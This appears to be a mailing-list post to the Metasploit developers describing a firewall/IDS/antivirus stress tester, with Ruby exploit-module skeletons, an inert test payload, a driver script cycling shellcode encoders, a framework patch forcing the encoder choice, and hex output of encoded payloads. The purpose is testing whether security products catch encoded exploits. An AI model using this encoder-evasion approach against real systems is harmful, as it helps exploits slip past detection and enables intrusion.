Firewall/IDS/AV Stress Tester

[vmukhi at vsnl.com (vmukhi at vsnl.com)]

I am using the Metasploit Framework to write a Firewall/IDS/Anti Virus Stress testing product. Too many people I meet 
are convinced that if they use the above products, there networks are safe from intruders. Thus I wanted a product that 
will take a exploit and encode it with different encoders to see which signatures are caught by the Firewall/IDS/AV. I 
read an e-mail on this list that said that we even though we were allowed to specify an encoder the framework finally 
decided. I made the folllowing in the source code to achieve my objective. Am i doing the right thing. The code follows

vijay20.rb
require 'msf/core'
module Msf
class Exploits::Vijay20 < Msf::Exploit::Remote
include Exploit::Remote::Ftp
def initialize()
info1 = {
'Targets' => [['Windows Universal', {'Platform' => 'win' , 'Ret' => 0x13 } ],] ,
'Payload' => {
#'Encoder' => 'x86/jmp_call_additive', 
#'Encoder' => 'x86/call4_dword_xor', 
#'Encoder' => 'x86/fnstenv_mov', 
#'Space' => 100,
'BadChars' => "\x90" ,
},
'DefaultTarget' => 0 
}
super(info1)
end
def exploit
payload.raw.each_byte {|x| printf("%x ", x)}
printf("\n");
payload.encoded.each_byte {|x| printf("%x ", x)}
printf("\n");
#connect
#buf = "AAAAAAA" + "\x88\xff\x12\x00"
#buf = buf + payload.raw
#send_cmd (["USER",buf], false)
#disconnect
end # end exploit
end # end class
end # end module

I have written a simple ftp server in C under windows with a buffer overflow. The exploit vijay20.rb first displays 
both the raw and encoded payloads and the rest of the code that connects to the server and serves the exploit is 
commented out.The above file is in the modules/exloits folder.

mukhi4.rb
require 'msf/core'
module Msf
module Payloads
module Singles
module Windows
module Mukhi4
        include Msf::Payload::Windows
        include Msf::Payload::Single
        def initialize(info = {})
                super(update_info(info,
                        'Name'          => 'Windows Execute Command',
                        'Version'       => '$Revision: 1.4 $',
                        'Description'   => 'Execute an arbitrary command',
                        'Author'        => 'vlad902',
                        'Platform'      => 'win',
                        'Arch'          => ARCH_X86,
                        'Payload'       =>
                                {
                                        'Payload' => "\x90\xcc"
                                }
                        ))
        end
        def generate
                return super  + "\x00"
        end

end
end end end end

Payload mukhi4.rb is a simple copy on an existing payload and returns only 90 and cc. This file is placed in the 
payloads/singles/windows folder.

manish.rb
require 'msf/base'
framework = Msf::Simple::Framework.create
input = Rex::Ui::Text::Input::Stdio.new
output = Rex::Ui::Text::Output::Stdio.new
driver = Msf::ExploitDriver.new(framework)
driver.exploit = framework.exploits.create('vijay20')
driver.payload = framework.payloads.create('windows/mukhi4' )
driver.exploit.datastore.import_options_from_s('Encoder=x86/jmp_call_additive')
driver.payload.share_datastore(driver.exploit.datastore)
driver.target_idx = 0;
driver.exploit.init_ui(input , output)
driver.payload.init_ui(input , output)
driver.run
driver.exploit.datastore.import_options_from_s('Encoder=x86/call4_dword_xor')
driver.payload.share_datastore(driver.exploit.datastore)
driver.run
driver.exploit.datastore.import_options_from_s('Encoder=x86/fnstenv_mov')
driver.payload.share_datastore(driver.exploit.datastore)
driver.run

A program that we will run as 

ruby -Ilib manish.rb

Output 
90 cc 0
fc bb e7 4b 69 63 eb c 5e 56 31 1e ad 1 c3 85 c0 75 f7 c3 e8 ef ff ff ff 77 87 69 63 77 18 6a 63
90 cc 0
33 c9 83 e9 ff e8 ff ff ff ff c0 5e 81 76 e b 66 1 c5 83 ee fc e2 f4 9b aa 1 c5
90 cc 0
6a 1 59 d9 ee d9 74 24 f4 5b 81 73 13 2e 5e 2c 6a 83 eb fc e2 f4 be 92 2c 6a

In this progarm copied from the samples,  we call running the same exploit vijay20 and payload mukhi4 with different 
encoders and henc the output is different.

To achieve this we made the following changes in the file encoded_payload.rb found in folder lib/msf/core

encoded_payload.rb
#our code
if ( pinst.datastore['Encoder'] )
preferred = framework.encoders[ pinst.datastore['Encoder'] ] 
encoders.unshift([pinst.datastore['Encoder'], preferred ])
end                     
#their code                     
                        encoders.each { |encname, encmod|
                                self.encoder = encmod.new
                                self.encoded = nil

We simply copied some code written earlier so that the variables we set place our encoder first in the array and thus 
we can decide the encoder used. Is this the right way to write a stress test product. 

We have a site wwww.vijaymukhi.com where you see that I have used a zillion products and languages in the past. From 
all of them yours Metasploit Framework is  not the best but by far the best framework I have ever used in my life. I 
believe that your product will change the way we write exploits and security tools. I have even learnt Ruby and written 
over 250 pages on it. You may not realize what a great service you have done people like me who teach OS internals. 
Some of the tools I plan now writing could not have been possible without your framework. 

An open offer, if any developer from your team comes to Mumbai/Bombay India please be my guest. You will be doing me a 
favour. My  way of saying thank you for the great framework that you have build.

Vijay Mukhi